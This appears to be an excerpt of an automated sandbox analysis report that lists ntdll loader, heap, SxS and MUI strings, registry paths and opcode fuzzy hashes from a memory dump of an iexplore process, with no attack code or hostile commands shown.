                                                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              Strings
                                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 032F21BF
                                                                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 032F219F
                                                                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 032F2160, 032F219A, 032F21BA
                                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 032F2165
                                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 032F2178
                                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 032F2180
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                              Strings
                                                                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 032F8177, 032F81EB
                                                                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 032F81E5
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 032BC6C3
                                                                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 032F8170
                                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 032F8181, 032F81F5
                                                                                                                                                                              • LdrpInitializeProcess, xrefs: 032BC6C4
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                              Strings
                                                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 032A542B
                                                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 032A5247
                                                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 032A5352
                                                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 032A527B
                                                                                                                                                                              • WindowsExcludedProcs, xrefs: 032A522A
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                              Strings
                                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 032F21DE
                                                                                                                                                                              • .Local, xrefs: 032B28D8
                                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 032F22B6
                                                                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 032F21D9, 032F22B1
                                                                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                              • API String ID: 0-2391371766
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                              • API String ID: 0-2779062949
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                                              • API String ID: 0-318774311
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: %$&$@
                                                                                                                                                                              • API String ID: 0-1537733988
                                                                                                                                                                              Strings
                                                                                                                                                                              • GlobalizationUserSettings, xrefs: 0335B834
                                                                                                                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0335B82A
                                                                                                                                                                              • TargetNtPath, xrefs: 0335B82F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                              • API String ID: 0-505981995
                                                                                                                                                                              Strings
                                                                                                                                                                              • HEAP: , xrefs: 032DE6B3
                                                                                                                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 032DE6C6
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 032DE6A6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                              • API String ID: 0-1340214556
                                                                                                                                                                              Strings
                                                                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 032F82D7
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 032F82E8
                                                                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 032F82DE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-1783798831
                                                                                                                                                                              Strings
                                                                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 032F1B4A
                                                                                                                                                                              • LdrpAllocateTls, xrefs: 032F1B40
                                                                                                                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 032F1B39
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                              • API String ID: 0-4274184382
                                                                                                                                                                              Strings
                                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0333C1C5
                                                                                                                                                                              • PreferredUILanguages, xrefs: 0333C212
                                                                                                                                                                              • @, xrefs: 0333C1F1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                              • API String ID: 0-2968386058
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                              • API String ID: 0-1373925480
                                                                                                                                                                              Strings
                                                                                                                                                                              • LdrpCheckRedirection, xrefs: 0330488F
                                                                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03304888
                                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03304899
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                              • API String ID: 0-3154609507
                                                                                                                                                                              Strings
                                                                                                                                                                              • Actx , xrefs: 032B33AC
                                                                                                                                                                              • SXS: %s() passed the empty activation context data, xrefs: 032F29FE
                                                                                                                                                                              • RtlCreateActivationContext, xrefs: 032F29F9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                              • API String ID: 0-859632880
                                                                                                                                                                              Strings
                                                                                                                                                                              • LdrpInitializeTls, xrefs: 032F1A47
                                                                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 032F1A51
                                                                                                                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 032F1A40
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                              • API String ID: 0-931879808
                                                                                                                                                                              Strings
                                                                                                                                                                              • BuildLabEx, xrefs: 032C130F
                                                                                                                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 032C127B
                                                                                                                                                                              • @, xrefs: 032C12A5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                              • API String ID: 0-3051831665
                                                                                                                                                                              Strings
                                                                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 033020F3
                                                                                                                                                                              • LdrpInitializationFailure, xrefs: 033020FA
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03302104
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-2986994758
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                              • String ID: #%u
                                                                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: `$`
                                                                                                                                                                              • API String ID: 0-197956300
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$$
                                                                                                                                                                              • API String ID: 0-233714265
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0328A309
                                                                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0328A2FB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                              • API String ID: 0-2876891731
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .Local\$@
                                                                                                                                                                              • API String ID: 0-380025441
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: MUI
                                                                                                                                                                              • API String ID: 0-1339004836
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: GlobalTags
                                                                                                                                                                              • API String ID: 0-1106856819
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: EXT-
                                                                                                                                                                              • API String ID: 0-1948896318
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: PreferredUILanguages
                                                                                                                                                                              • API String ID: 0-1884656846
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: BinaryHash
                                                                                                                                                                              • API String ID: 0-2202222882
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: verifier.dll
                                                                                                                                                                              • API String ID: 0-3265496382
                                                                                                                                                                              • String ID: kLsE
                                                                                                                                                                              • API String ID: 0-3058123920
                                                                                                                                                                              • String ID: Flst
                                                                                                                                                                              • API String ID: 0-2374792617
                                                                                                                                                                              • String ID: Actx
                                                                                                                                                                              • API String ID: 0-89312691
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f19d49f91700909980027c5854e435ad2eafafdf6812aafb394f2cdb3bd855e5
                                                                                                                                                                              • Instruction ID: d6258c245cae749088598706df3291d704e6397506afc24f7375e19fdbd33c94
                                                                                                                                                                              • Opcode Fuzzy Hash: f19d49f91700909980027c5854e435ad2eafafdf6812aafb394f2cdb3bd855e5
                                                                                                                                                                              • Instruction Fuzzy Hash: FA913435A20716DBEF24DB29C481BBEB7A5EF84710F0A4067E8059B390E778D9C1C7A1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4823364f3c1a8d6febfda06e22835278d53578d7bfba9a34d8a55f21f3b47ebd
                                                                                                                                                                              • Instruction ID: 95ed95ca14652ee5f5cc8186b007d412a5c7e8ea42964ec857c72358de968ea5
                                                                                                                                                                              • Opcode Fuzzy Hash: 4823364f3c1a8d6febfda06e22835278d53578d7bfba9a34d8a55f21f3b47ebd
                                                                                                                                                                              • Instruction Fuzzy Hash: 70B112756193819FD354CF28C580A5AFBF1BB88304F184A6EF89ACB391D371E985CB46
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                                              • Instruction ID: 5177031dc9a5b050b507ade972582706d1ac615a252af1b42933a083fc5d84c2
                                                                                                                                                                              • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                                              • Instruction Fuzzy Hash: 5781CE76E2061A8BCF14CF9CC8927ADF7B6FB84710F5A816AC815BB340D6719980CB91
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4e94493b17e2ebe7914452335a075ed1bb1eef71bab80847707b365abed6c361
                                                                                                                                                                              • Instruction ID: d6de9d4049b229ee3565c6784e6b7c1857da0ebb7d808808093f24d9bc32e462
                                                                                                                                                                              • Opcode Fuzzy Hash: 4e94493b17e2ebe7914452335a075ed1bb1eef71bab80847707b365abed6c361
                                                                                                                                                                              • Instruction Fuzzy Hash: 72817B71A20609AFDB25CFA9D880BEEF7BAFF48340F15442DE555A7210DB70AC85CB60
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9bb50862840a46551ffcbbd8a2c4f958e53191a59a4544d3b3f401ec0042cbf2
                                                                                                                                                                              • Instruction ID: 5cba5721facefbc58ddf879e72f654e0340d76f8829e79eea96471844024fb53
                                                                                                                                                                              • Opcode Fuzzy Hash: 9bb50862840a46551ffcbbd8a2c4f958e53191a59a4544d3b3f401ec0042cbf2
                                                                                                                                                                              • Instruction Fuzzy Hash: B471A1B5D24666DBDB25CF58D8917FDBBB8FF48B10F58415AE881AB350D3709880CBA0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 90fdb804ddf472309a07791d846808ea982a5ca650081e160a5d554513c697b8
                                                                                                                                                                              • Instruction ID: 1e27a0a3ba8ec430773cf248b764f39bfbb77a223ab706a809606f8ef988863f
                                                                                                                                                                              • Opcode Fuzzy Hash: 90fdb804ddf472309a07791d846808ea982a5ca650081e160a5d554513c697b8
                                                                                                                                                                              • Instruction Fuzzy Hash: FC71D235624346EFD711DF28C880B6AB7E5FF84710F0889AAE898CB751DB74D885CB91
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                              • Instruction ID: a6631a70fc7c533759a116670e81d92f0506761a9dbb25a1144da614087cfbec
                                                                                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                              • Instruction Fuzzy Hash: C6717C75E10609AFDB14DFA9C994BEEBBB8FF48300F144569E505EB290DB34EA41CB90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4290d98340e1f6efbfa3fd76bf7671f4345c4107df4c0e2c8933e8f3911f7026
                                                                                                                                                                              • Instruction ID: 5a144dbc4c4526651d358bf43b4fcb7c046c3cc9ae1dc622539bfc9a48bde6a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 4290d98340e1f6efbfa3fd76bf7671f4345c4107df4c0e2c8933e8f3911f7026
                                                                                                                                                                              • Instruction Fuzzy Hash: CA712536200B00EFEB39DF94CC82F56B7A9EF44720F154918EA568B6A0DB75E894DB50
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0b11a16453c406942464d1af61ce17f225d2ae31374242003475f8dafb5718ad
                                                                                                                                                                              • Instruction ID: 6ac1b9baf31ffcde9078b112abc167a1f7bf598ca996d6d5c1819dda71c1c3d0
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b11a16453c406942464d1af61ce17f225d2ae31374242003475f8dafb5718ad
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E815075A00645DFCB09CFA8C490AAEB7F1FF88310F1981A9D859EB355D734EA51CB90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
